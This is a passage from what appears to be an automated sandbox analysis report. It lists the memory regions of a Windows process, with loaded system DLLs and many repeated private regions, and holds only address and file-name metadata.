"\\Windows\\System32\\dwmcore.dll" (normalized: "c:\\windows\\system32\\dwmcore.dll") Region: id = 14384 start_va = 0x7fefa9f0000 end_va = 0x7fefaa16fff entry_point = 0x7fefa9f0000 region_type = mapped_file name = "dwmredir.dll" filename = "\\Windows\\System32\\dwmredir.dll" (normalized: "c:\\windows\\system32\\dwmredir.dll") Region: id = 14385 start_va = 0x7fefb970000 end_va = 0x7fefba99fff entry_point = 0x7fefb970000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 14386 start_va = 0x7fefbae0000 end_va = 0x7fefbaf7fff entry_point = 0x7fefbae0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 14387 start_va = 0x7fefbf10000 end_va = 0x7fefbf65fff entry_point = 0x7fefbf10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 14388 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 14389 start_va = 0x7fefd660000 end_va = 0x7fefd66efff entry_point = 0x7fefd660000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 14390 start_va = 0x7fefd750000 end_va = 0x7fefd8b6fff entry_point = 0x7fefd750000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 14391 start_va = 0x7fefd8c0000 end_va = 0x7fefd8f9fff entry_point = 0x7fefd8c0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 14392 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14393 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14394 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14395 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14396 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 14397 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14398 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14399 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14400 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14401 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14402 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14403 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14404 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 14405 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 14406 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 14407 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 14408 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 14409 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 14470 start_va = 0x2930000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 14471 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 14472 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 14473 start_va = 0x7fefe360000 end_va = 0x7feff0e7fff entry_point = 0x7fefe360000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 14474 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 14475 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 14476 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14477 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 14830 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 14831 start_va = 0x1e10000 end_va = 0x1e54fff entry_point = 0x1e10000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 14832 start_va = 0x1e10000 end_va = 0x1e54fff entry_point = 0x1e10000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 14833 start_va = 0x1e10000 end_va = 0x1e54fff entry_point = 0x1e10000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 14834 start_va = 0x1e10000 end_va = 0x1e54fff entry_point = 0x1e10000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 14835 start_va = 0x1e10000 end_va = 0x1e54fff entry_point = 0x1e10000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 14836 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 14837 start_va = 0x7fefc960000 end_va = 0x7fefc97dfff entry_point = 0x7fefc960000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 14838 start_va = 0x7fefd5c0000 end_va = 0x7fefd5cefff entry_point = 0x7fefd5c0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 14839 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 14840 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 14841 start_va = 0x340000 end_va = 0x340fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 14842 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14843 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14844 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14845 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14846 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14847 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14848 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14849 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14850 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14851 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14852 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14853 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14854 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14855 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14856 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14857 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14858 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14859 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14860 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14861 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14862 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14863 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14864 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14865 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14866 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14867 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14868 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14869 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14870 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14871 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14872 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14873 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14874 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14875 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14876 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14877 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14878 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14879 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14880 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14881 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14882 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14883 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14884 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14885 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14886 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14887 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14888 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14889 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14890 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14891 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14892 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14893 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14894 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14895 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14896 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14897 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14898 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14899 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14900 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14901 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14902 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14903 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14904 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14905 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14906 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14907 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14908 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14909 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14910 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14911 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14912 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14913 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14914 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14915 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14916 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14917 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14918 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14919 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14920 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14921 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14922 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14923 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14924 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14925 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14926 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14927 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14928 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14929 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14930 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14931 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14932 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14933 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14934 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14935 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14936 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14937 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14938 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14939 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14940 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14941 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14942 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14943 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14944 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14945 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14946 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14947 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14948 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14949 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14950 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14951 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14952 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14953 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14954 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14955 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14956 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14957 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14958 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14959 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14960 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14961 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14962 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14963 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14964 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14965 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14966 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14967 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14968 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14969 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14970 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14971 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14972 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14973 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14974 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14975 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14976 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14977 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14978 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14979 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14980 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14981 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14982 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14983 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14984 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14985 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14986 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14987 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14988 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14989 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14990 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14991 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14992 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14993 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14994 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14995 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14996 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14997 start_va = 0x350000 end_va = 0x352fff entry_point = 0x0 region_type = private 